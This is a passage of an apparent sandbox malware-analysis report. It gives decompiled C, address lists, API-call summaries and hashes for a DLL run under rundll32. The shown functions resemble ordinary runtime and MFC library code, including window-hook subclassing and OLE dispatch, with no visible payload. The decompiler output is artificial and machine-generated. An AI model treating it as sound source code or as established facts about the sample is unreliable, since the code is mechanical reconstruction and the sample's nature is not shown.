										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100351B5(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E10035178(_t37);
					return 0;
				}
			}

















                                                                                                                          0x1003548e
                                                                                                                          0x1003548e
                                                                                                                          0x1003549a
                                                                                                                          0x1003549e
                                                                                                                          0x100354be
                                                                                                                          0x100354cb
                                                                                                                          0x100354d8
                                                                                                                          0x100354dd
                                                                                                                          0x100354df
                                                                                                                          0x100354e6
                                                                                                                          0x100354ec
                                                                                                                          0x100354f1
                                                                                                                          0x10035509
                                                                                                                          0x1003550e
                                                                                                                          0x10035518
                                                                                                                          0x10035522
                                                                                                                          0x10035528
                                                                                                                          0x100354f3
                                                                                                                          0x100354f3
                                                                                                                          0x100354fa
                                                                                                                          0x00000000
                                                                                                                          0x100354fc
                                                                                                                          0x100354fc
                                                                                                                          0x10035503
                                                                                                                          0x00000000
                                                                                                                          0x10035505
                                                                                                                          0x10035505
                                                                                                                          0x10035507
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x10035507
                                                                                                                          0x10035503
                                                                                                                          0x100354fa
                                                                                                                          0x1003552d
                                                                                                                          0x10035533
                                                                                                                          0x10035536
                                                                                                                          0x1003553b
                                                                                                                          0x1003560d
                                                                                                                          0x1003560d
                                                                                                                          0x1003560d
                                                                                                                          0x10035541
                                                                                                                          0x10035548
                                                                                                                          0x1003554a
                                                                                                                          0x1003554c
                                                                                                                          0x00000000
                                                                                                                          0x10035552
                                                                                                                          0x10035552
                                                                                                                          0x10035568
                                                                                                                          0x10035578
                                                                                                                          0x10035588
                                                                                                                          0x10035595
                                                                                                                          0x1003559a
                                                                                                                          0x1003559f
                                                                                                                          0x100355a1
                                                                                                                          0x10035608
                                                                                                                          0x10035608
                                                                                                                          0x00000000
                                                                                                                          0x100355a3
                                                                                                                          0x100355a3
                                                                                                                          0x100355b4
                                                                                                                          0x100355b6
                                                                                                                          0x100355b9
                                                                                                                          0x100355be
                                                                                                                          0x00000000
                                                                                                                          0x100355c0
                                                                                                                          0x100355cc
                                                                                                                          0x100355ce
                                                                                                                          0x100355d2
                                                                                                                          0x00000000
                                                                                                                          0x100355d4
                                                                                                                          0x100355d4
                                                                                                                          0x100355d5
                                                                                                                          0x100355e9
                                                                                                                          0x100355eb
                                                                                                                          0x00000000
                                                                                                                          0x100355ed
                                                                                                                          0x100355ed
                                                                                                                          0x100355ef
                                                                                                                          0x100355f0
                                                                                                                          0x100355f7
                                                                                                                          0x100355fd
                                                                                                                          0x10035601
                                                                                                                          0x10035605
                                                                                                                          0x10035605
                                                                                                                          0x100355eb
                                                                                                                          0x100355d2
                                                                                                                          0x100355be
                                                                                                                          0x100355a1
                                                                                                                          0x1003554c
                                                                                                                          0x10035611
                                                                                                                          0x100354a0
                                                                                                                          0x100354a0
                                                                                                                          0x100354a8
                                                                                                                          0x100354a8

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                          • __mtterm.LIBCMT ref: 100354A0
                                                                                                                            • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                            • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                            • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                            • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                          • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                          • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                          • __init_pointers.LIBCMT ref: 10035552
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                          • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                          • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                          • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                          • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                          • API String ID: 4287529916-3819984048
                                                                                                                          • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                          • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                          • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                          • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1001C915 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 92%
                                                                                                                          			E1001C915(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E10030D90(E1004429C, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E10015B30);
				 *(_t117 - 0x120) = _t111;
				_t54 = E10020C26(_t94, 0x100575a4, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E100201F1(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E1001F9FC(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x10057854;
						if( *0x10057854 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x10057454;
								if( *0x10057454 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x10057454; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E1001C7D1);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E10030030(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10019B2E(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x10057454 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E10032D2F(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1001FA48(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E1001B083(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001B780);
							__eflags = _t83 - E1001B780;
							if(_t83 != E1001B780) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E1001F30C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E10014B55(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E10030E13(_t94, _t106, _t111);
				}
			}



























                                                                                                                          0x1001c915
                                                                                                                          0x1001c915
                                                                                                                          0x1001c915
                                                                                                                          0x1001c91f
                                                                                                                          0x1001c924
                                                                                                                          0x1001c927
                                                                                                                          0x1001c92a
                                                                                                                          0x1001c934
                                                                                                                          0x1001c93a
                                                                                                                          0x1001c941
                                                                                                                          0x1001c943
                                                                                                                          0x1001c946
                                                                                                                          0x1001c94e
                                                                                                                          0x1001c950
                                                                                                                          0x1001c950
                                                                                                                          0x1001c959
                                                                                                                          0x1001c96e
                                                                                                                          0x1001c970
                                                                                                                          0x1001c973
                                                                                                                          0x1001c978
                                                                                                                          0x1001c97a
                                                                                                                          0x1001c97e
                                                                                                                          0x1001c984
                                                                                                                          0x1001c99b
                                                                                                                          0x1001c99b
                                                                                                                          0x1001c9a2
                                                                                                                          0x1001c9ef
                                                                                                                          0x1001c9ef
                                                                                                                          0x1001c9f1
                                                                                                                          0x1001ca59
                                                                                                                          0x1001ca61
                                                                                                                          0x1001ca9d
                                                                                                                          0x1001caa9
                                                                                                                          0x1001cab0
                                                                                                                          0x1001cae2
                                                                                                                          0x1001cae5
                                                                                                                          0x1001caeb
                                                                                                                          0x1001caed
                                                                                                                          0x1001caf0
                                                                                                                          0x1001caf8
                                                                                                                          0x1001caff
                                                                                                                          0x1001cb01
                                                                                                                          0x1001cb03
                                                                                                                          0x1001cb0a
                                                                                                                          0x1001cb12
                                                                                                                          0x1001cb14
                                                                                                                          0x1001cb17
                                                                                                                          0x1001cb1a
                                                                                                                          0x1001cb28
                                                                                                                          0x1001cb28
                                                                                                                          0x1001cb17
                                                                                                                          0x1001cb03
                                                                                                                          0x1001cb2e
                                                                                                                          0x1001cb34
                                                                                                                          0x1001cb40
                                                                                                                          0x1001cb46
                                                                                                                          0x1001cb4d
                                                                                                                          0x1001cb4f
                                                                                                                          0x1001cb54
                                                                                                                          0x1001cb5a
                                                                                                                          0x1001cb5a
                                                                                                                          0x1001cb5a
                                                                                                                          0x1001cb5a
                                                                                                                          0x00000000
                                                                                                                          0x1001cb5e
                                                                                                                          0x00000000
                                                                                                                          0x1001cab2
                                                                                                                          0x1001ca65
                                                                                                                          0x1001ca70
                                                                                                                          0x1001ca7b
                                                                                                                          0x1001ca81
                                                                                                                          0x1001ca87
                                                                                                                          0x1001ca88
                                                                                                                          0x1001ca8a
                                                                                                                          0x1001ca92
                                                                                                                          0x1001ca95
                                                                                                                          0x1001ca9b
                                                                                                                          0x1001cac1
                                                                                                                          0x1001cac7
                                                                                                                          0x1001cac9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1001cad3
                                                                                                                          0x1001cad7
                                                                                                                          0x1001cadc
                                                                                                                          0x1001cae0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1001cae0
                                                                                                                          0x00000000
                                                                                                                          0x1001ca9b
                                                                                                                          0x1001c9f9
                                                                                                                          0x1001c9fe
                                                                                                                          0x1001ca05
                                                                                                                          0x1001ca0e
                                                                                                                          0x1001ca24
                                                                                                                          0x1001ca26
                                                                                                                          0x1001ca2c
                                                                                                                          0x1001ca2e
                                                                                                                          0x1001ca30
                                                                                                                          0x1001ca30
                                                                                                                          0x1001ca38
                                                                                                                          0x1001ca3c
                                                                                                                          0x1001ca40
                                                                                                                          0x1001ca44
                                                                                                                          0x1001ca4a
                                                                                                                          0x1001ca4d
                                                                                                                          0x1001ca4f
                                                                                                                          0x1001ca4f
                                                                                                                          0x00000000
                                                                                                                          0x1001ca44
                                                                                                                          0x1001c9a7
                                                                                                                          0x1001c9ad
                                                                                                                          0x1001c9b2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1001c9b8
                                                                                                                          0x1001c9bb
                                                                                                                          0x1001c9c0
                                                                                                                          0x1001c9cd
                                                                                                                          0x1001c9d1
                                                                                                                          0x1001c9d7
                                                                                                                          0x1001c9d7
                                                                                                                          0x1001c9e0
                                                                                                                          0x1001c9e5
                                                                                                                          0x1001c9e9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1001c9e9
                                                                                                                          0x1001c986
                                                                                                                          0x1001c98d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1001c993
                                                                                                                          0x1001c995
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1001c95b
                                                                                                                          0x1001c963
                                                                                                                          0x1001cb60
                                                                                                                          0x1001cb65
                                                                                                                          0x1001cb65

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                            • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                          • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                          • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                          • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                          • _memset.LIBCMT ref: 1001CA70
                                                                                                                          • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                          • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                          • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                          • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                          • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                          • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                          • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                          • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                          • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                          • API String ID: 867647115-4034971020
                                                                                                                          • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                          • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                          • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                          • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 1002DB49 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 46%
                                                                                                                          			E1002DB49(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				signed int _t194;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				signed int _t291;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E10030D27(E10044FCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10030DFF(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10030030(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x100492f8;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 = _t194 - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if(_t194 == _t257) {
					L37:
					_t295 = 0;
					E1002BDD9(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10030030(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					_t289 = _t300 - 0x54;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1004b61c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1002DAF2(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10014517(_t257, _t289, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1002CDE9(_t300 - 0x68, _t289);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10014517(_t257, _t289, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1002E0D9))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E1002BC90(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1001FCED(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E100144EC(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1002D549(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E1001FF59(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E1001FF59(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E1001FF59(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E10033135(_t300 + 0x14, 0x100505f8);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
